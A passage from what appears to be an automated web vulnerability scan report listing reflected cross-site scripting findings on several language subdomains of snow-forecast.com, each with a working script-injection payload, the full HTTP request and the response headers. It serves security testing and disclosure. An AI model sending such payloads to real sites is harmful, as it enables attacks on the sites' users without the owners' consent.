This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?fbd33"><script>alert(1)</script>d7988552faf=1 HTTP/1.1 Host: fr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "8a901d5353021fa01ede1cf6b390266a" X-Runtime: 53 Content-Length: 18278 Set-Cookie: sfcsid=048a48143f38767ee0266dc25842f948; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.23. http://fr.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fr.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 562cd"><script>alert(1)</script>ffd0d8d03f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?562cd"><script>alert(1)</script>ffd0d8d03f5=1 HTTP/1.1 Host: fr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "cbe0f3fcfef66f711dd7cd43367cd8b1" X-Runtime: 72 Content-Length: 27897 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.24. http://fr.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fr.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1cae"><script>alert(1)</script>70e3b97aaa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?e1cae"><script>alert(1)</script>70e3b97aaa0=1 HTTP/1.1 Host: fr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "c2e8b2e42b637c7ad7057468a8823269" X-Runtime: 138 Content-Length: 42498 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:26 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.25. http://gr.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gr.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be10d"><script>alert(1)</script>dc7ac305d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?be10d"><script>alert(1)</script>dc7ac305d43=1 HTTP/1.1 Host: gr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "24509b44ef0502cb5e67c94e061cc0d2" X-Runtime: 49 Content-Length: 25341 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5684"><script>alert(1)</script>4fa73c52b4 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'c5684"><script>alert(1)</script>4fa73c52b4 HTTP/1.1 Host: gr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "bb87ec0a5f9313177002024497795958" X-Runtime: 55 Content-Length: 19040 Set-Cookie: sfcsid=b357ac6cdfef32c035f1bb8990353f65; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca41"><script>alert(1)</script>d077813c239 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E7ca41"><script>alert(1)</script>d077813c239 HTTP/1.1 Host: gr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "99663f8a46c8ee3d4cd401621cd39b65" X-Runtime: 56 Content-Length: 20152 Set-Cookie: sfcsid=26f45e6fa4457a0a7503856d8e60c213; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.28. http://gr.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gr.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47337"><script>alert(1)</script>fe9cb287127 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?47337"><script>alert(1)</script>fe9cb287127=1 HTTP/1.1 Host: gr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "a1944101ebe4d3de6a59a004326de0b8" X-Runtime: 69 Content-Length: 19106 Set-Cookie: sfcsid=0111d83228f39e3db62f876165f03046; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.29. http://gr.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gr.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff3b4"><script>alert(1)</script>8913c0754de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?ff3b4"><script>alert(1)</script>8913c0754de=1 HTTP/1.1 Host: gr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "962bd9bc5c677054985264b7d769af85" X-Runtime: 75 Content-Length: 28552 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.30. http://gr.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gr.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af16d"><script>alert(1)</script>b02a78d5cb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?af16d"><script>alert(1)</script>b02a78d5cb8=1 HTTP/1.1 Host: gr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "d93fa7940591c8af4dc97eba77265895" X-Runtime: 123 Content-Length: 44031 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:31 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.31. http://hu.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hu.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93ab1"><script>alert(1)</script>f4a7d557df6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?93ab1"><script>alert(1)</script>f4a7d557df6=1 HTTP/1.1 Host: hu.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "93592ed0579518a2f05b25841fc04e1a" X-Runtime: 48 Content-Length: 24265 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8edf"><script>alert(1)</script>4c20355e216 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'a8edf"><script>alert(1)</script>4c20355e216 HTTP/1.1 Host: hu.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "95c512ef0c060626c695ec48f2bad3a4" X-Runtime: 64 Content-Length: 18145 Set-Cookie: sfcsid=540c1e5ada0d391f86ca15237bf70798; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ce3"><script>alert(1)</script>addccba9450 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E86ce3"><script>alert(1)</script>addccba9450 HTTP/1.1 Host: hu.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "9b984eb32636ca525aa609c0178ffb43" X-Runtime: 69 Content-Length: 19270 Set-Cookie: sfcsid=4800a75d29a7a05b933b123a9fe366bd; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.34. http://hu.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hu.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25758"><script>alert(1)</script>16544f37f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?25758"><script>alert(1)</script>16544f37f92=1 HTTP/1.1 Host: hu.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "43707197e671969dfb764a35b894e805" X-Runtime: 101 Content-Length: 18201 Set-Cookie: sfcsid=a9777e1e7a843583de5a2b70946adf9e; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.35. http://hu.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hu.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39a58"><script>alert(1)</script>703c662859d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?39a58"><script>alert(1)</script>703c662859d=1 HTTP/1.1 Host: hu.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "e1fd2ede3bb05cfe2a27c96d98946d67" X-Runtime: 76 Content-Length: 27719 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.36. http://hu.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hu.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f75a4"><script>alert(1)</script>a36d13b9ddc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?f75a4"><script>alert(1)</script>a36d13b9ddc=1 HTTP/1.1 Host: hu.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "985e0b9c151a98c05d603dca43e6044e" X-Runtime: 618 Content-Length: 42356 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:38 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.37. http://il.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://il.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e394"><script>alert(1)</script>a2a7132104b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?5e394"><script>alert(1)</script>a2a7132104b=1 HTTP/1.1 Host: il.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "c5576b7f54f3d4219727fac551cf180e" X-Runtime: 55 Content-Length: 24713 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 137ae"><script>alert(1)</script>bca6a284eb0 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'137ae"><script>alert(1)</script>bca6a284eb0 HTTP/1.1 Host: il.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "18330f52cf014fecc727b0ab5c8bbbba" X-Runtime: 53 Content-Length: 18526 Set-Cookie: sfcsid=efbea5006b3415ccf3b2e8262cc17659; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e912"><script>alert(1)</script>936b987c166 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E2e912"><script>alert(1)</script>936b987c166 HTTP/1.1 Host: il.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "0734137561b609824fcf1b8284ab1214" X-Runtime: 56 Content-Length: 19606 Set-Cookie: sfcsid=394718f5d4b44901c8fb2b9fdc3bdd76; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.40. http://il.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://il.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36f79"><script>alert(1)</script>a28f858fc0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?36f79"><script>alert(1)</script>a28f858fc0d=1 HTTP/1.1 Host: il.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "beeb09a9db64fcee1f8aa2c557535b97" X-Runtime: 233 Content-Length: 18574 Set-Cookie: sfcsid=9edf345fd458a9de0f404f5c5a5334ad; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.41. http://il.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://il.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2a72"><script>alert(1)</script>b7773d4b53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?e2a72"><script>alert(1)</script>b7773d4b53=1 HTTP/1.1 Host: il.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "f1065ac4774777a6fed3571cb3ca3f0d" X-Runtime: 430 Content-Length: 28053 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.42. http://il.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://il.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32017"><script>alert(1)</script>354cddd340d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?32017"><script>alert(1)</script>354cddd340d=1 HTTP/1.1 Host: il.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "386b97ed9b468851fd164efcd5fabe0f" X-Runtime: 136 Content-Length: 42886 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:39 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>Courchevel Ski Re ...[SNIP]... <a href="http://hu.snow-forecast.com/resorts/Courchevel?32017"><script>alert(1)</script>354cddd340d=1"> ...[SNIP]...
1.43. http://it.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38500"><script>alert(1)</script>00efb245e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?38500"><script>alert(1)</script>00efb245e91=1 HTTP/1.1 Host: it.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "869dfb05dab593aec3b83a7f26aca6e4" X-Runtime: 74 Content-Length: 24359 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b8c2"><script>alert(1)</script>0d95d137ec5 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'7b8c2"><script>alert(1)</script>0d95d137ec5 HTTP/1.1 Host: it.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "dc997c74e07cc76c31817aa2fe66aa5a" X-Runtime: 270 Content-Length: 18224 Set-Cookie: sfcsid=f319d85969b2c00da1fabd0eb8dd72c2; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
